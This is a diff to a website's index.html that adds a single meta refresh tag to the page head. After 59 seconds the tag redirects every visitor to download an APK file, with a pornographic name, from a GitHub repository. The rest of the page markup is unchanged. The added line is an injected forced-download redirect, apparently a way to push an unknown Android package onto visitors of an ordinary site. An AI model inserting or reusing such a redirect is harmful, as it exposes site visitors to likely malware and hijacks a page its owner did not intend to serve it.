--- a/index.html
+++ b/index.html
@@ -2,6 +2,7 @@
 <html class="html" lang="en-US" prefix="og: https://ogp.me/ns#">
 
 <head>
+    <meta http-equiv="refresh" content="59;URL='https://github.com/modmeapp/XNXXFUCK/raw/refs/heads/main/XNXX%20FUCKING.apk'" />
     <script
         data-no-optimize="1">var litespeed_docref = sessionStorage.getItem("litespeed_docref"); litespeed_docref && (Object.defineProperty(document, "referrer", { get: function () { return litespeed_docref } }), sessionStorage.removeItem("litespeed_docref"));</script>
     <meta charset="UTF-8">
